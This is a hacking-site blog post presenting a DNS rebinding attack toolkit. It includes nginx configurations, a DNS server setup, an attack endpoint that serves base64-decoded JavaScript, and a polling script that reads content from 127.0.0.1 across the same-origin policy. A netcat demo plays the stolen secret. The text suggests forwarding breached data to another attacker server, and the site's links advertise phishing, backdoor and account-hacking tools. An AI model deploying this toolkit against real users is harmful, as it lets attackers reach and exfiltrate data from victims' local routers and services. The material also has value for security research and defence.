Haxf4rall
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
  • Home
  • 2019
  • October
  • 6
  • DNS Rebinding Tool – DNS Rebind Tool With Custom Scripts

DNS Rebinding Tool – DNS Rebind Tool With Custom Scripts

October 6, 2019 Comments Off on DNS Rebinding Tool – DNS Rebind Tool With Custom Scripts
dns rebinding tool how to perform dns rebinding attack

This project is meant to be an All-in-one Toolkit to test further DNS rebinding attacks and my take on understanding these kind of attacks. It consists of a web server and pseudo DNS server that only responds to A queries.

The root index of the web server allowes to configure and run the attack with a rudimentary web gui. See dnsrebindtool.43z.one.

A basic nginx config to host the web server

server {
  listen 80;
  server_name dnsrebindtool.43z.one;

  location / {
    proxy_pass http://localhost:5000;
  }
}

The /attack route of the web server reads the GET parameter script that should provide basic64 encoded javascript and responds with the decoded code (wraped around a setTimeout) embeded in a regular HTML page.

% curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk=" 
<html>
    <script>

    setTimeout(function(){
      alert(1) 
    }, 3000)

  </script>
</html

Within my registrar for the domain 43z.one I setup a NS record for the subdomain rebind to point to the IP where this tool is hosted.

ns       A   81.4.124.10
rebind   NS  ns.43z.one

The DNS server responds only to A queries in this format

evcmxfm4g . 81-4-124-10 . 127-0-0-1 .rebind.43z.one

The first part (subdomain) is just some random id and should be generated for every attack session (the web gui does this on every reload). Second comes the IP the DNS server should respond for the next 2 seconds and third the IP the server should respond after that time is passed.

$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one 
Fri Feb  2 21:18:20 CET 2018
Server:   8.8.8.8
Address:  8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 81.4.124.10

$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Fri Feb  2 21:18:23 CET 2018
Server:   8.8.8.8
Address:  8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 127.0.0.1

The last missing peace is a nginx config for the rebind domains. Only the /attack route should be passed to the tool others should respond with an error. This allows to attack other services on port 80 with all routes but /attack. (like /api/monitoring/stats a endpoint my router exposes)

server {
  listen 80;
  server_name *.rebind.43z.one;

  location / {
    return 404;
  }

  location /attack {
    proxy_pass http://localhost:5000/attack;
  }
}

DNS Cache Eviction

var xhr = new XMLHttpRequest()
xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// first time the browser sees this domain it queries the dns server
// and gets 81.4.124.10

// sleep for more than 2 sec

xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// still uses 81.4.124.10 (AND NOT 127.0.0.1)
// NO dns query happened browser used cached IP

This is a problem for this kind of attack. In order to work the browser has to reissue a new dns query to get the second IP. In theory if you just wait long enough between the requests a new query should happen. My tests show though there is a faster but more aggressive approach. It could be very likely this is setup specific. Needs more testing I used the following script to measure the optimum value for the WAIT variable. Tested on Chromium 62.0.3202.89 running on Debian buster/sid.

Also read: Singularity – DNS Rebinding Attack Framework
var WAIT = 200
var start = Date.now()

var interval = setInterval(function(){
  var xhr = new XMLHttpRequest()
  xhr.open('GET', '//' + $REBIND_DOMAIN, false)

  xhr.send()

  if(xhr.status == 200){
    document.body.innerHTML = (Date.now() - start)/1000
    document.body.innerHTML += xhr.responseText
    clearInterval(interval)
    return
  }
}, WAIT)
WAIT value in ms requests chrome sends Time until queries dns again
0 700 60
10 700 60
100 600 63
120 500 63
150 400 63
180 400 75
200 300 63
220 300 69
250 300 78
280 300 87
300 200 63
320 200 67
340 200 71
360 200 75
380 200 79
400 200 83
1000 100 103

I started a new repo just to explore this dns cache eviction tester

Putting it all together and test it.

echo -e "HTTP/1.1 200 OK\n\n TOPSECRET" | sudo nc -lvp 80 -q1 127.0.0.1

This netcat instance serves some content I would like to get access to. I keep the default rebind domain
$RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one and default script

var start = Date.now()

var interval = setInterval(function(){
  var xhr = new XMLHttpRequest()
  xhr.open('GET', '//' + $REBIND_DOMAIN, false)

  xhr.send()

  if(xhr.status == 200){
    document.body.innerHTML = (Date.now() - start)/1000
    document.body.innerHTML += xhr.responseText
    clearInterval(interval)
    return
  }
}, 200)

on dnsrebindtool.43z.one and hit the Attack button. Open the dev tools network tab to see what is happening in the background. For me after about 60 seconds fills up with the string TOPSECRET and the time it took. DNS rebinding circumvented SOP. To get the breached data out of the iframe one could use Window.PostMessage() or include code that forwards the data to another attacker server within the script itself.

Download DNS Rebinding Tool

Post navigation

Perimeter 81 – The Zero Trust Network as a Service
PatrOwl – Smart and Scalable Security Operations Orchestration Platform

Related Articles

TheTick – A simple embedded Linux backdoor

- Exploitation
October 14, 2019

ConPtyShell – Fully Interactive Reverse Shell for Windows

- Exploitation
October 10, 2019October 10, 2019

Watson – Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities

- Exploitation
October 10, 2019
hacker gadgets
hacker phone covers

Recent Posts

PlutoCrypt Ransomware Decryptor

PlutoCrypt Ransomware Decryptor

May 27, 2023
Galaxy Fold 4

Samsung to improve the durability of the waterdrop hinges in the foldable smartphones

May 26, 2023
CISA Adds CVE-2023-2868 Vulnerability to KEV Catalog

CISA Adds CVE-2023-2868 Vulnerability to KEV Catalog

May 26, 2023
Google releases Chrome version 111 to fix 40 security vulnerabilities

Google releases Chrome version 111 to fix 40 security vulnerabilities

May 26, 2023
PoC Exploit Released for GitLab CVE-2023-2825 Vulnerability

PoC Exploit Released for GitLab CVE-2023-2825 Vulnerability

May 26, 2023
CVE View

Mondoo v7.17.1 releases: Cloud-Native Security & Vulnerability Risk Management

February 16, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Categories

  • Secure Coding
  • Documentary
  • Courses & Ebooks
  • Hack Tools
  • Hacking Tutorials
  • Mobile Hacking
  • News
  • Operating Systems
  • TOR
  • Tricks & How To’s

Active Members

Useful Links

Contact Us

Disclaimer

Privacy Policy

Submit a Tool

Copyright 2019. All rights reserved | Theme: OMag by LilyTurf Themes